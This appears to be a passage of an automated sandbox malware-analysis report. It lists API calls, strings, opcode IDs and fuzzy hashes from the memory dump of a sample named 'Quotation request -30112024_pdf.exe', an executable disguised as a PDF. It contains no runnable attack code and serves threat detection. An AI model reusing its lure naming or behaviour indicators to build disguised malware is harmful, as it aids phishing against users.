                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$_sprintf_strlen
                                                                    • String ID: %02X
                                                                    • API String ID: 1921645428-436463671
                                                                    • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                    • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                    • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                    • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: Combobox
                                                                    • API String ID: 3850602802-2096851135
                                                                    • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                    • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                    • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                    • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                    APIs
                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: LengthMessageSendTextWindow
                                                                    • String ID: edit
                                                                    • API String ID: 2978978980-2167791130
                                                                    • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                    • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                    • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                    • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemorySleepStatus
                                                                    • String ID: @
                                                                    • API String ID: 2783356886-2766056989
                                                                    • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                    • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                    • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                    • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: htonsinet_addr
                                                                    • String ID: 255.255.255.255
                                                                    • API String ID: 3832099526-2422070025
                                                                    • Opcode ID: 336bf04b74032a76dffc0b3dec239f3a33009b0f842574d7a0c0b2a9c387c113
                                                                    • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                    • Opcode Fuzzy Hash: 336bf04b74032a76dffc0b3dec239f3a33009b0f842574d7a0c0b2a9c387c113
                                                                    • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                    APIs
                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: InternetOpen
                                                                    • String ID: <local>
                                                                    • API String ID: 2038078732-4266983199
                                                                    • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                    • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                    • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                    • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: u,D
                                                                    • API String ID: 4104443479-3858472334
                                                                    • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                    • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                    • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                    • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • _memmove.LIBCMT ref: 00401B57
                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                    • String ID: @EXITCODE
                                                                    • API String ID: 2734553683-3436989551
                                                                    • Opcode ID: 6671e83096f05fbf7ed832023dfd6df0aed7d84870a55488e32c5eab381b68c1
                                                                    • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                    • Opcode Fuzzy Hash: 6671e83096f05fbf7ed832023dfd6df0aed7d84870a55488e32c5eab381b68c1
                                                                    • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
APIs
• SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• wsprintfW.USER32 ref: 0045612A
Strings
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: MessageSend_mallocwsprintf
• String ID: %d/%02d/%02d
• API String ID: 1262938277-328681919
• Opcode ID: 2f94ef12d061241edb9979ef4b8dfec1a2b2b476f2643c079f431c0c1a0d2850
• Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
• Opcode Fuzzy Hash: 2f94ef12d061241edb9979ef4b8dfec1a2b2b476f2643c079f431c0c1a0d2850
• Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
APIs
• InternetCloseHandle.WININET(?), ref: 00442663
• InternetCloseHandle.WININET ref: 00442668
  • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
Strings
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: CloseHandleInternet$ObjectSingleWait
• String ID: aeB
• API String ID: 857135153-906807131
• Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
• Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
• Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
• Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
APIs
Strings
• C:\Users\user\Desktop\Quotation request -30112024_pdf.exe, xrefs: 0043324B
• ^B, xrefs: 00433248
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: _wcsncpy
• String ID: ^B$C:\Users\user\Desktop\Quotation request -30112024_pdf.exe
• API String ID: 1735881322-1751989784
• Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
• Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
• Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
• Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
• PostMessageW.USER32(00000000), ref: 00441C05
  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
Strings
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
• Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
• Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
• Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
Strings
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
• Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
• Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
• Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
  • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
Strings
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
• Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
• Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
• Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D